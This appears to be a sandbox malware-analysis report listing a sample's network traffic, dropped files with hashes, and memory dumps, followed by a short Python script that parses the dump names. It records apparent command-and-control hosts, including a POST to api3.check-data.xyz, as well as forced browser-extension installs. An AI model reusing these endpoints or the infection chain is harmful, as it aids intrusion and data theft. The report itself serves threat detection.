    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
    Pragma: no-cache
    Expires: Mon, 01 Jan 1990 00:00:00 GMT
    Date: Mon, 22 Jul 2024 05:14:13 GMT
    Location: https://clients2.googleusercontent.com/crx/blobs/Af2yII1ndlPDSZOakU4Pf4dRwz2i7NEBSdkCxXz6p-VxI8k8ALZJYhy93dUG5dQTpZLFWhmC3leh78jLFqRLDDDZuoV3r2mP7_mi-THl3KqBKyrYG6_XAMZSmuXhyNZZWqODP_YYDvMQ-Mm7WqsGMg/OIKGCNJAMBFOOAIGMDLJBLBAEELMEKEM_2_0_0_3.crx
    Content-Type: text/html; charset=UTF-8
    X-Content-Type-Options: nosniff
    X-Frame-Options: SAMEORIGIN
    X-XSS-Protection: 1; mode=block
    Server: GSE
    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
    Accept-Ranges: none
    Vary: Accept-Encoding
    Transfer-Encoding: chunked
• [US] DNS clients2.googleusercontent.com (pjDElFp.exe)
  Remote address: 8.8.8.8:53
  Request:
    clients2.googleusercontent.com IN A
  Response:
    clients2.googleusercontent.com IN CNAME googlehosted.l.googleusercontent.com
    googlehosted.l.googleusercontent.com IN A 142.250.178.1
• [GB] GET https://clients2.googleusercontent.com/crx/blobs/Af2yII1ndlPDSZOakU4Pf4dRwz2i7NEBSdkCxXz6p-VxI8k8ALZJYhy93dUG5dQTpZLFWhmC3leh78jLFqRLDDDZuoV3r2mP7_mi-THl3KqBKyrYG6_XAMZSmuXhyNZZWqODP_YYDvMQ-Mm7WqsGMg/OIKGCNJAMBFOOAIGMDLJBLBAEELMEKEM_2_0_0_3.crx (pjDElFp.exe)
  Remote address: 142.250.178.1:443
  Request:
    GET /crx/blobs/Af2yII1ndlPDSZOakU4Pf4dRwz2i7NEBSdkCxXz6p-VxI8k8ALZJYhy93dUG5dQTpZLFWhmC3leh78jLFqRLDDDZuoV3r2mP7_mi-THl3KqBKyrYG6_XAMZSmuXhyNZZWqODP_YYDvMQ-Mm7WqsGMg/OIKGCNJAMBFOOAIGMDLJBLBAEELMEKEM_2_0_0_3.crx HTTP/1.1
    Connection: Keep-Alive
    Cache-Control: no-cache
    Host: clients2.googleusercontent.com
  Response:
    HTTP/1.1 200 OK
    Accept-Ranges: bytes
    Content-Length: 26186
    X-GUploader-UploadID: ACJd0NrJWlaJHCLrTWyAK0PIM9bJCLOW3VC-TcgXOU3hvoXLWTvXnlr2i8oBG8EFht2tYGoOseI
    X-Goog-Hash: crc32c=i5zIOg==
    Server: UploadServer
    Date: Sun, 21 Jul 2024 06:44:05 GMT
    Expires: Mon, 21 Jul 2025 06:44:05 GMT
    Cache-Control: public, max-age=31536000
    Age: 81008
    Last-Modified: Fri, 31 Mar 2023 12:41:59 GMT
    ETag: eefd433b_0ed85c7c_6772d0c2_d374e578_c3d87100
    Content-Type: application/x-chrome-extension
    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                        • flag-us
                                                                                                                          DNS
                                                                                                                          api3.check-data.xyz
                                                                                                                          rundll32.exe
                                                                                                                          Remote address:
                                                                                                                          8.8.8.8:53
                                                                                                                          Request
                                                                                                                          api3.check-data.xyz
                                                                                                                          IN A
                                                                                                                          Response
                                                                                                                          api3.check-data.xyz
                                                                                                                          IN CNAME
                                                                                                                          checkdata-1114476139.us-west-2.elb.amazonaws.com
                                                                                                                          checkdata-1114476139.us-west-2.elb.amazonaws.com
                                                                                                                          IN A
                                                                                                                          44.240.96.128
                                                                                                                          checkdata-1114476139.us-west-2.elb.amazonaws.com
                                                                                                                          IN A
                                                                                                                          44.237.52.63
                                                                                                                        • flag-us
                                                                                                                          POST
                                                                                                                          http://api3.check-data.xyz/api2/google_api_ifi
                                                                                                                          rundll32.exe
                                                                                                                          Remote address:
                                                                                                                          44.240.96.128:80
                                                                                                                          Request
                                                                                                                          POST /api2/google_api_ifi HTTP/1.1
                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/0 Safari/537.36
                                                                                                                          Host: api3.check-data.xyz
                                                                                                                          Content-Length: 723
                                                                                                                          Connection: Keep-Alive
                                                                                                                          Cache-Control: no-cache
                                                                                                                          Response
                                                                                                                          HTTP/1.1 200 OK
                                                                                                                          Access-Control-Allow-Origin: *
                                                                                                                          Cache-control: no-cache="set-cookie"
                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                          Date: Mon, 22 Jul 2024 05:12:02 GMT
                                                                                                                          Server: nginx
                                                                                                                          Set-Cookie: AWSELB=9327DF5F0AF3D375CDC9DE0AFF98FDC82A9589C9820401D99493DFDF796F3DAB0062EEFB3E4A533F5B2753F2532FBA9D17E5754692E8600D254000879A4CE3001E279F1EF5;PATH=/;MAX-AGE=43200
                                                                                                                          Content-Length: 0
                                                                                                                          Connection: keep-alive
                                                                                                                        • 54.210.117.250:443
                                                                                                                          service-domain.xyz
                                                                                                                          tls
                                                                                                                          pjDElFp.exe
                                                                                                                          399 B
                                                                                                                          219 B
                                                                                                                          5
                                                                                                                          5
                                                                                                                        • 54.210.117.250:443
                                                                                                                          service-domain.xyz
                                                                                                                          tls
                                                                                                                          pjDElFp.exe
                                                                                                                          361 B
                                                                                                                          219 B
                                                                                                                          5
                                                                                                                          5
                                                                                                                        • 54.210.117.250:443
                                                                                                                          service-domain.xyz
                                                                                                                          tls
                                                                                                                          pjDElFp.exe
                                                                                                                          288 B
                                                                                                                          219 B
                                                                                                                          5
                                                                                                                          5
                                                                                                                        • 54.210.117.250:443
                                                                                                                          service-domain.xyz
                                                                                                                          pjDElFp.exe
                                                                                                                          190 B
                                                                                                                          92 B
                                                                                                                          4
                                                                                                                          2
                                                                                                                        • 216.58.201.99:80
                                                                                                                          http://c.pki.goog/r/r1.crl
                                                                                                                          http
                                                                                                                          pjDElFp.exe
                                                                                                                          400 B
                                                                                                                          1.7kB
                                                                                                                          6
                                                                                                                          4

                                                                                                                          HTTP Request

                                                                                                                          GET http://c.pki.goog/r/r1.crl

                                                                                                                          HTTP Response

                                                                                                                          200
                                                                                                                        • 216.58.201.99:80
                                                                                                                          http://o.pki.goog/wr2/MFEwTzBNMEswSTAJBgUrDgMCGgUABBRTQtSEi8EX%2BbYUTXd8%2ByMxD3s1zQQU3hse7XkV1D43JMMhu%2Bw0OW1CsjACEC3M0Op9qKoaCXtJy2kA5Hs%3D
                                                                                                                          http
                                                                                                                          pjDElFp.exe
                                                                                                                          1.0kB
                                                                                                                          2.3kB
                                                                                                                          7
                                                                                                                          5

                                                                                                                          HTTP Request

                                                                                                                          GET http://o.pki.goog/wr2/MFIwUDBOMEwwSjAJBgUrDgMCGgUABBRTQtSEi8EX%2BbYUTXd8%2ByMxD3s1zQQU3hse7XkV1D43JMMhu%2Bw0OW1CsjACEQC1wDSQwr%2F7UxDebtw0D9JJ

                                                                                                                          HTTP Response

                                                                                                                          200

                                                                                                                          HTTP Request

                                                                                                                          GET http://o.pki.goog/wr2/MFIwUDBOMEwwSjAJBgUrDgMCGgUABBRTQtSEi8EX%2BbYUTXd8%2ByMxD3s1zQQU3hse7XkV1D43JMMhu%2Bw0OW1CsjACEQDJocJI3cuzOAqV4KAdwn94

                                                                                                                          HTTP Response

                                                                                                                          200

                                                                                                                          HTTP Request

                                                                                                                          GET http://o.pki.goog/wr2/MFEwTzBNMEswSTAJBgUrDgMCGgUABBRTQtSEi8EX%2BbYUTXd8%2ByMxD3s1zQQU3hse7XkV1D43JMMhu%2Bw0OW1CsjACEC3M0Op9qKoaCXtJy2kA5Hs%3D

                                                                                                                          HTTP Response

                                                                                                                          200
                                                                                                                        • 142.250.200.14:443
                                                                                                                          https://clients2.google.com/service/update2/crx?response=redirect&os=win&arch=x86&nacl_arch=x86-64&prod=chromecrx&prodchannel=&prodversion=59.0.3071.86&lang=en-US&acceptformat=crx2,crx3&x=id%3Doikgcnjambfooaigmdljblbaeelmekem%26installsource%3Dondemand%26uc&yeabpvIfiW
                                                                                                                          tls, http
                                                                                                                          pjDElFp.exe
                                                                                                                          1.1kB
                                                                                                                          8.6kB
                                                                                                                          10
                                                                                                                          13

                                                                                                                          HTTP Request

                                                                                                                          GET https://clients2.google.com/service/update2/crx?response=redirect&os=win&arch=x86&nacl_arch=x86-64&prod=chromecrx&prodchannel=&prodversion=59.0.3071.86&lang=en-US&acceptformat=crx2,crx3&x=id%3Doikgcnjambfooaigmdljblbaeelmekem%26installsource%3Dondemand%26uc&yeabpvIfiW

                                                                                                                          HTTP Response

                                                                                                                          302
                                                                                                                        • 142.250.178.1:443
                                                                                                                          https://clients2.googleusercontent.com/crx/blobs/Af2yII1ndlPDSZOakU4Pf4dRwz2i7NEBSdkCxXz6p-VxI8k8ALZJYhy93dUG5dQTpZLFWhmC3leh78jLFqRLDDDZuoV3r2mP7_mi-THl3KqBKyrYG6_XAMZSmuXhyNZZWqODP_YYDvMQ-Mm7WqsGMg/OIKGCNJAMBFOOAIGMDLJBLBAEELMEKEM_2_0_0_3.crx
                                                                                                                          tls, http
                                                                                                                          pjDElFp.exe
                                                                                                                          1.6kB
                                                                                                                          37.8kB
                                                                                                                          20
                                                                                                                          31

                                                                                                                          HTTP Request

                                                                                                                          GET https://clients2.googleusercontent.com/crx/blobs/Af2yII1ndlPDSZOakU4Pf4dRwz2i7NEBSdkCxXz6p-VxI8k8ALZJYhy93dUG5dQTpZLFWhmC3leh78jLFqRLDDDZuoV3r2mP7_mi-THl3KqBKyrYG6_XAMZSmuXhyNZZWqODP_YYDvMQ-Mm7WqsGMg/OIKGCNJAMBFOOAIGMDLJBLBAEELMEKEM_2_0_0_3.crx

                                                                                                                          HTTP Response

                                                                                                                          200
                                                                                                                        • 44.240.96.128:80
                                                                                                                          http://api3.check-data.xyz/api2/google_api_ifi
                                                                                                                          http
                                                                                                                          rundll32.exe
                                                                                                                          1.2kB
                                                                                                                          536 B
                                                                                                                          4
                                                                                                                          3

                                                                                                                          HTTP Request

                                                                                                                          POST http://api3.check-data.xyz/api2/google_api_ifi

                                                                                                                          HTTP Response

                                                                                                                          200
                                                                                                                        • 8.8.8.8:53
                                                                                                                          service-domain.xyz
                                                                                                                          dns
                                                                                                                          pjDElFp.exe
                                                                                                                          64 B
                                                                                                                          80 B
                                                                                                                          1
                                                                                                                          1

                                                                                                                          DNS Request

                                                                                                                          service-domain.xyz

                                                                                                                          DNS Response

                                                                                                                          54.210.117.250

                                                                                                                        • 8.8.8.8:53
                                                                                                                          c.pki.goog
                                                                                                                          dns
                                                                                                                          pjDElFp.exe
                                                                                                                          56 B
                                                                                                                          107 B
                                                                                                                          1
                                                                                                                          1

                                                                                                                          DNS Request

                                                                                                                          c.pki.goog

                                                                                                                          DNS Response

                                                                                                                          216.58.201.99

                                                                                                                        • 8.8.8.8:53
                                                                                                                          o.pki.goog
                                                                                                                          dns
                                                                                                                          pjDElFp.exe
                                                                                                                          56 B
                                                                                                                          107 B
                                                                                                                          1
                                                                                                                          1

                                                                                                                          DNS Request

                                                                                                                          o.pki.goog

                                                                                                                          DNS Response

                                                                                                                          216.58.201.99

                                                                                                                        • 8.8.8.8:53
                                                                                                                          clients2.google.com
                                                                                                                          dns
                                                                                                                          pjDElFp.exe
                                                                                                                          65 B
                                                                                                                          105 B
                                                                                                                          1
                                                                                                                          1

                                                                                                                          DNS Request

                                                                                                                          clients2.google.com

                                                                                                                          DNS Response

                                                                                                                          142.250.200.14

                                                                                                                        • 8.8.8.8:53
                                                                                                                          clients2.googleusercontent.com
                                                                                                                          dns
                                                                                                                          pjDElFp.exe
                                                                                                                          76 B
                                                                                                                          121 B
                                                                                                                          1
                                                                                                                          1

                                                                                                                          DNS Request

clients2.googleusercontent.com

DNS Response: 142.250.178.1

• 8.8.8.8:53  api3.check-data.xyz  dns  rundll32.exe  65 B  159 B  1  1
  DNS Request: api3.check-data.xyz
  DNS Response: 44.240.96.128, 44.237.52.63

                                                                                                                        MITRE ATT&CK Enterprise v15

Downloads

• C:\Program Files (x86)\CYZcjjLrQSSSC\YlWuqsp.xml
  Filesize: 2KB
  MD5: ec8d642ef6bbc8f5076e447b9f7e0e4b
  SHA1: 9ae7a122c3329a7d4ff6297c80bac441e4e2a835
  SHA256: 7e4e6797111f818e3c890b5b3a3ba110b073590a2cef49f83a9f3699eb5ea8cd
  SHA512: edba6af3f9f0eb338d5bf2842a0aa5e557dec22dddd54a72f6cdbb7edbe2b67bebf16acae6845bd2dcbfc86d91cf432310a901978bcb7b7b2d37f9b4adacf41c

• C:\Program Files (x86)\MaCEdJmjU\rejZDPf.xml
  Filesize: 2KB
  MD5: 9e0975ad6029911a3e725b516747f2cc
  SHA1: 72da298aaf7ccd52fc2aa4c30428635428439eec
  SHA256: 6b795ba6be75f7484af5515f6bf6f37162b1384be8e61e45c49404ae65bbaa92
  SHA512: 3810b7181955fb0db341042f30fd10ff9096ee2fb4ce80bda238f2d348fe47c3cee4edc9eb8320a25c1d2436c0f22f12fad29ffd023fd0c63b148b3bbb79ccdb

• C:\Program Files (x86)\esZXvMCNuGEfqJuxklR\jYSNcTR.xml
  Filesize: 2KB
  MD5: 1e36eadb9fa0cd501d01182f7252bfc8
  SHA1: d15dbb81b17cef98f88c94248ca54ba84ea89e07
  SHA256: eff48282c5ead7e40f29efa79647732f7fc4c706d2ddb4a4328f339715659ee2
  SHA512: 8fb08bc6edb702e60ac8df47e70090918d8908d1943faf56ffb46591a9a95b4b166f53f38de794442ae588a449384dca7cfb7d6d4ccfd0400d8e0896db2a2b64

• C:\Program Files (x86)\zWTlFEDWyZjU2\BkLeqNI.xml
  Filesize: 2KB
  MD5: 4d6bac0845b3cfd933de9524223df0e0
  SHA1: 4290ef99453e6163165e7483c0b1c7bf11448c4d
  SHA256: 1a89a3fa833bec51b28b0dd64f00edc511bdb2d6df8ec0318a9e4d1bbca987af
  SHA512: a4fc0ee81da15c93ff1914b373b5f09ee8af0972ed8048f2483c2b107f543aa99dc357a0d432b01cbeb6ace0182a312e64f81f75410a03cbd193c900cbe0eeb9

• C:\Program Files\Mozilla Firefox\browser\features\{469DEDC5-791B-41B7-99CA-EB25B08298D1}.xpi
  Filesize: 2.5MB
  MD5: 71a261ae47864aa3532236af7f8959cf
  SHA1: 719906f5ad873f1f7246de060e7287faf8f2c1a7
  SHA256: fb4d99fde7d73bb07824aebb585f8f898d7206bcdf9236acc9ef4369dc8e438b
  SHA512: 183bd79ee88cb74321906f76ab547489811f3cdd416352b9f19de0a6bb5f8205d27005c6501c992c28e1189b4a81be4c67fbf4f2e897c825d0e636c6f9b645d3

• C:\ProgramData\hDwfgHvtnjxOxeVB\FFvMggw.xml
  Filesize: 2KB
  MD5: 9188454148621069418aa040e48f9b49
  SHA1: b950947e07beec4d5b561235196652fd73b0f59d
  SHA256: 11c6e8a70e5f157373b7be8fae6f54a7ee8a2e7cf1116bee0e6597e82b46dfaf
  SHA512: ba04752759fcff5faa546bdbc5f2451324fefae6db5dd458dd7e0fcc51aed45b177ea36d9fd48455ab611bb5f19d231ac52fb658eb7eece146bbffb059ac07c6

• C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\gfcdbodapcbfckbfpmgeldfkkgjknceo\1.2.0_0\_locales\en_GB\messages.json
  Filesize: 187B
  MD5: 2a1e12a4811892d95962998e184399d8
  SHA1: 55b0ae8a7b5a5d6094827ede8e6a1d26d4b4a720
  SHA256: 32b4406692c26b540fea815a9bb56df1f164140cd849e8025930b7425036cceb
  SHA512: bb54d5e8684a6bfeac559b7c7a7551eed6a8a43a4c6464218cb0adb1c89fea124b69760690c3124af86fa68ac3fdbe903eaa098f0af2b6a58f4702c803abc089

• C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\gfcdbodapcbfckbfpmgeldfkkgjknceo\1.2.0_0\_locales\fa\messages.json
  Filesize: 136B
  MD5: 238d2612f510ea51d0d3eaa09e7136b1
  SHA1: 0953540c6c2fd928dd03b38c43f6e8541e1a0328
  SHA256: 801162df89a8ad2b1a51de75e86eba3958b12960660960a5ffafe9bc55bc293e
  SHA512: 2630dd7a3c17dc963b1a71d81295cf22f8b3838748b55c433318e1e22f5b143a6d374ca2e5a8420659fa130200fbaa4814d0f093b1eca244b5635a3b99878e1c

• C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\gfcdbodapcbfckbfpmgeldfkkgjknceo\1.2.0_0\_locales\pt_BR\messages.json
  Filesize: 150B
  MD5: 0b1cf3deab325f8987f2ee31c6afc8ea
  SHA1: 6a51537cef82143d3d768759b21598542d683904
  SHA256: 0ec437af3f59fef30355cf803966a2b9a0cd9323d390297496f750775995a6bf
  SHA512: 5bc1f5a2d38f4a071513e2ac25b241c8e5584bed8d77e7fc4194855898d51a328dd73200f5aae6c9bc1b2a304e40e56bc686192074bd8a1bcc98f4971dee428f

• C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences
  Filesize: 10KB
  MD5: 862496cc66b72997f27cc4f161e757fe
  SHA1: f93d0cec5880e8921708d05d643557e6bba77174
  SHA256: 54e1236b02afc30f0daa7aaa09e51b7f55d537d0e48aca05348c5c291fdde5cd
  SHA512: 80267b908440a1f3326104ea325f8eac24da0d1b3f6deee3159028cd572560df7aed955429a1dd39c67fd71cbddbabd4de607fb3ca74d217dea9360a42770947

• C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Secure Preferences
  Filesize: 28KB
  MD5: 90ef2f32488739dc6eda5d67c873f987
  SHA1: cac7e334d0c9f30acd9e9c538ab6a6e46a3118dc
  SHA256: 20c34cc822e3d7945602e7e49d700375f9be6d8afd019ae9c6edeebfe257dda8
  SHA512: 7c877dbce7de0c34a88883059de86cd2104f805c2a8bc5aec41706855ad8add94de523e84733766055617f148dbd28fcb3c8c36f2e3f0f6e406e1d3658e4a718

• C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\3DFTOYRG8R5OOI32KOBV.temp
  Filesize: 7KB
  MD5: 8b5be526d65e671aa26cf4cddca3e51a
  SHA1: a4baf155d286549248eafbd1c5b9142871031f72
  SHA256: 20ef2d5dbd63c5961877ee708bd2209fee5ec8ee9d60df923b6130c5154d7f97
  SHA512: b2fa529a06b0c17974bc0d5915dbb78b713f538ad3aa4c9e3c39f6546259866bae2be7768be91386c70c3a339c02546a74f305097f00c6a3d22fd58eb4b14e6f

• C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
  Filesize: 7KB
  MD5: 438018fbeb7af13f6e27ccc0501f738a
  SHA1: 70c7531a0edcd53d4f1f9f7bbdc0155bbb7f8746
  SHA256: 572c3b352e061a266fcd4579e10205dc3d9dd6e9639a3c14f9593eaa7f08b7b1
  SHA512: 9c2a5984cbe343bacbf5d2c780c781f3f038abc505c6f2a7e76cde4b48ce914c3ca72505bb10c3d3eefa518eebbb58a5d3f4bbc38bf8ee18ff44dfcbbd7afeb2

• C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\nndpnsl0.default-release\prefs.js
  Filesize: 7KB
  MD5: 89e26a2b3bc7b497c5134d1737118133
  SHA1: 58a582e07448eafd2d7cd5161698fff8d5c9dbfa
  SHA256: f8842efab886c4b9f90a86efa5e51357811bbc80022ea5357cb4a9ac61f16f41
  SHA512: f90e04bb9083f2d108c2db41bec9e1da7cd48e25298b2e16bf60adb0acf09471de0419db4410b42d6de55da4a7c6931d25f500ff9fe7aea399f40bccd0b0c164

• C:\Windows\Temp\QpEhKTiRofuFzpEd\xJZbFTiH\HOoBbSzDWzqHdGzU.wsf
  Filesize: 9KB
  MD5: 5ab82674f3357670f515825c91a927bc
  SHA1: bc6eeb548d5623eb48fad56009f6eecc3f459525
  SHA256: 7eeb62ec2d0666c06b6f0b01ce153e5f5428d122a329b3c74ff5e9717e4fff15
  SHA512: 6b0ec8b9265226885a9b000024acbadac2f89585934f1006eea4efc969118dfde55f0a1dfc03b63a31651cdb6b91140c57daab32b295145463760511a92c4cb0

• C:\Windows\system32\GroupPolicy\Machine\Registry.pol
  Filesize: 5KB
  MD5: 7ac1c29e74a29826aa3958ace292e749
  SHA1: 113b6a237db1140203123728bbb9ede43314ac77
  SHA256: 153db52824e3389b65ccbe55d41d518d422e99347257d0fd7c9fa30c2d1623cd
  SHA512: e66574d796e8939d09f814a293f8a7e213fc7015a2e4e5bcaed9004b624729833af9e626c643c971dbce98abed9fecc9c4676bac9104d6fae2f2cf842c8c54d9

• \Users\Admin\AppData\Local\Temp\7zSCC35.tmp\Install.exe
  Filesize: 6.4MB
  MD5: 937a707de797e2cd82db6cb1e7bd8028
  SHA1: 0e0a041836fb513d4c3325d1cee07d60c72908ec
  SHA256: 8007a258a3ce141de8381da8d049886aed118feeb86bd0d358678a33116d42f3
  SHA512: 8a3361aa4a677f3435e0e4c66d45844bec6da9fad15113a51643df1eb110c6ef44f4c59b91f366f5c4e7cc900d01af71f1d002639ecd1a9caf848f07a2c6bab2

• \Users\Admin\AppData\Local\Temp\7zSCDCA.tmp\Install.exe
  Filesize: 6.7MB
  MD5: 4a6234985179c24fab6e1ca0c926d8b7
  SHA1: 53e1858155418e1c0b163bfc796af17c20f9293d
  SHA256: 5d451382e517894f68583cd635aa094378c963c2fd67517d2d1466807da4e41e
  SHA512: 5916a7c4d9ed751cb7a494ab8b3444a59c635b2768bb2d395b8917b306cc07b66206d2ccf4b784ca4afdf0edce1b1f2c1ca6365d480cb42aaf40492770b3c6de

• \Windows\Temp\QpEhKTiRofuFzpEd\yUyAIlrQ\CRfojXT.dll
  Filesize: 6.5MB
  MD5: 0adf6200e5ae41efdcb874ef6c181c18
  SHA1: 3d65aeb9d1411f437aaa3a34218327a2d8503860
  SHA256: 25e86744bd0c1402446e21fe0729f19dfb3b865a6d0e4ce597f3d5793ef75ea1
  SHA512: 53efdd8cc69c145b38af00a5ceaa0a7b3f102966f95f967a879a71dd750aae86786c5a85e50111176bc363f57a6453aebe06a34df87a23730c1b1f76d9df7107

• memory/1144-43-0x0000000002240000-0x0000000002248000-memory.dmp
  Filesize: 32KB

• memory/1144-42-0x000000001B750000-0x000000001BA32000-memory.dmp

                                                                                                                          Filesize

                                                                                                                          2.9MB

                                                                                                                        • memory/1812-22-0x0000000010000000-0x00000000105DD000-memory.dmp

                                                                                                                          Filesize

                                                                                                                          5.9MB

                                                                                                                        • memory/1868-53-0x0000000001D80000-0x0000000001D88000-memory.dmp

                                                                                                                          Filesize

                                                                                                                          32KB

                                                                                                                        • memory/1868-52-0x000000001B770000-0x000000001BA52000-memory.dmp

                                                                                                                          Filesize

                                                                                                                          2.9MB

                                                                                                                        • memory/2432-32-0x0000000010000000-0x00000000105DD000-memory.dmp

                                                                                                                          Filesize

                                                                                                                          5.9MB

                                                                                                                        • memory/2664-118-0x00000000012B0000-0x0000000001310000-memory.dmp

                                                                                                                          Filesize

                                                                                                                          384KB

                                                                                                                        • memory/2664-85-0x0000000001150000-0x00000000011D5000-memory.dmp

                                                                                                                          Filesize

                                                                                                                          532KB

                                                                                                                        • memory/2664-315-0x0000000002C00000-0x0000000002CD8000-memory.dmp

                                                                                                                          Filesize

                                                                                                                          864KB

                                                                                                                        • memory/2664-305-0x0000000002F60000-0x0000000002FE8000-memory.dmp

                                                                                                                          Filesize

                                                                                                                          544KB

                                                                                                                        • memory/2664-72-0x0000000010000000-0x00000000105DD000-memory.dmp

                                                                                                                          Filesize

                                                                                                                          5.9MB

                                                                                                                        • memory/3000-318-0x00000000012C0000-0x000000000189D000-memory.dmp

                                                                                                                          Filesize

                                                                                                                          5.9MB
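The memory-dump entries above follow tria.ge's `memory/<pid>-<n>-<start>-<end>-memory.dmp` naming, and the listed Filesize is just `end - start`. The script below is an added example, not part of this report and not tria.ge's own tooling: it parses those names, recomputes each region's size so the listed Filesize can be cross-checked, and groups regions by size, which shows that a 0x5DD000-byte (5.9MB) region appears in four of the dumped processes, three of them at 0x10000000, the default image base the MSVC linker assigns to DLLs. The entry list is copied from this page; the meaning of the second number (a per-process sequence index) and the report's size-rounding rule are assumptions.

```python
import re
from collections import defaultdict

# Constructed input: the memory/ entries listed in this report (names only).
DUMP_NAMES = [
    "memory/1144-43-0x0000000002240000-0x0000000002248000-memory.dmp",
    "memory/1144-42-0x000000001B750000-0x000000001BA32000-memory.dmp",
    "memory/1812-22-0x0000000010000000-0x00000000105DD000-memory.dmp",
    "memory/1868-53-0x0000000001D80000-0x0000000001D88000-memory.dmp",
    "memory/1868-52-0x000000001B770000-0x000000001BA52000-memory.dmp",
    "memory/2432-32-0x0000000010000000-0x00000000105DD000-memory.dmp",
    "memory/2664-118-0x00000000012B0000-0x0000000001310000-memory.dmp",
    "memory/2664-85-0x0000000001150000-0x00000000011D5000-memory.dmp",
    "memory/2664-315-0x0000000002C00000-0x0000000002CD8000-memory.dmp",
    "memory/2664-305-0x0000000002F60000-0x0000000002FE8000-memory.dmp",
    "memory/2664-72-0x0000000010000000-0x00000000105DD000-memory.dmp",
    "memory/3000-318-0x00000000012C0000-0x000000000189D000-memory.dmp",
]

# Assumed layout of a tria.ge dump name: memory/<pid>-<seq>-<start>-<end>-memory.dmp
DUMP_RE = re.compile(
    r"^memory/(?P<pid>\d+)-(?P<seq>\d+)-"
    r"0x(?P<start>[0-9A-Fa-f]+)-0x(?P<end>[0-9A-Fa-f]+)-memory\.dmp$"
)

DEFAULT_DLL_IMAGE_BASE = 0x10000000  # MSVC linker default ImageBase for DLLs


def parse_dump_name(name: str) -> dict:
    """Split one dump name into pid, sequence index, start/end addresses and size."""
    m = DUMP_RE.match(name)
    if not m:
        raise ValueError(f"not a tria.ge memory dump name: {name}")
    start, end = int(m["start"], 16), int(m["end"], 16)
    if end <= start:
        raise ValueError(f"end address does not follow start: {name}")
    return {
        "pid": int(m["pid"]),
        "seq": int(m["seq"]),
        "start": start,
        "end": end,
        "size": end - start,
    }


def human_size(n: int) -> str:
    """Format like the report's Filesize: whole KB below 1 MiB, one-decimal MB above (assumed rule)."""
    if n < 1024 * 1024:
        return f"{n // 1024}KB"
    return f"{n / (1024 * 1024):.1f}MB"


def shared_regions(names, min_processes: int = 2) -> dict:
    """Map region size -> sorted PIDs that dumped a region of exactly that size."""
    by_size = defaultdict(set)
    for name in names:
        entry = parse_dump_name(name)
        by_size[entry["size"]].add(entry["pid"])
    return {
        size: sorted(pids)
        for size, pids in by_size.items()
        if len(pids) >= min_processes
    }


def regions_at_default_image_base(names) -> list:
    """(pid, seq) of dumps starting at 0x10000000, where a non-relocated DLL usually lands."""
    return sorted(
        (e["pid"], e["seq"])
        for e in map(parse_dump_name, names)
        if e["start"] == DEFAULT_DLL_IMAGE_BASE
    )


if __name__ == "__main__":
    for name in DUMP_NAMES:
        e = parse_dump_name(name)
        print(f"pid {e['pid']:>5} seq {e['seq']:>4} "
              f"{e['start']:#018x}-{e['end']:#018x} {human_size(e['size']):>7}")
    for size, pids in shared_regions(DUMP_NAMES).items():
        print(f"size {size:#x} ({human_size(size)}) shared by PIDs {pids}")
    print("at default DLL image base:", regions_at_default_image_base(DUMP_NAMES))
```

Run it as-is to reproduce the sizes in the list; feed it the full `memory/` list of another report to see which regions recur across processes. A size shared by several PIDs, especially at 0x10000000, is a cheap first filter for which dumps to open in a disassembler before reading every one.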
